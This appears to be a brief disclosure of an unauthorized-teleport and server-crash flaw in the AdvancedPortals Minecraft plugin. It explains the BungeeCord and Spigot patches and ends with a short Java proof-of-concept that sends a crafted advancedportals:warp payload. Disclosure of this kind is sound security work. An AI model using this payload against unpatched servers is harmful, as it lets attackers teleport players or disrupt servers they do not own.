plugin messaging abuse again leads to a vulnerabiltiy in AdvancedPortals, a really popular minecraft plugin.
the popular minecraft plugin advancedportals had a vulnerability allowing unauthorized players to teleport specific, or everyone on a server to “portal destinations” at their will.
this allows users to crash servers (via spamming incorrect data to the channel), or make them borderline unplayable.
this does not affect 1.12 or below, but if your server is still on that old of a version, you should probably update anyway.
additionally, even with the plugin installed on BungeeCord (not Velocity, only BungeeCord), there was a mistake in the code allowing the plugin messages to go through to the backend even if the BungeeCord plugin that is supposed to prevent this is installed.
there was 2 commits to patch this, one to patch the spigot version to force a configuration file instead of checking if the server is a proxy and enabling, and one to patch the bungeecord version to fix the programming error returning before setCancelled was called on the event.
the patched version is available on spigotmc here.
this vulnerability allowed an attacker to use the plugin messaging channel advancedportals:warp with the following data:
- "BungeePortal" (command name)
- destination name
- player uuid
the destination name can be gotten via tab completing /advancedportals desti:, so there is no need for guessing that.
it is quite simple when put together
ByteArrayDataOutput in = ByteStreams.newDataOutput();
in.writeUTF("BungeePortal");
in.writeUTF(portal);
in.writeUTF(uuid.toString());
NetworkUtil.trySend(new ServerboundCustomPayloadPacket(new AdvancedPortalsCustomPayload(in.toByteArray()))); // AdvancedPortalsCustomPayload is a custom payload type with advancedportals:warp as the channel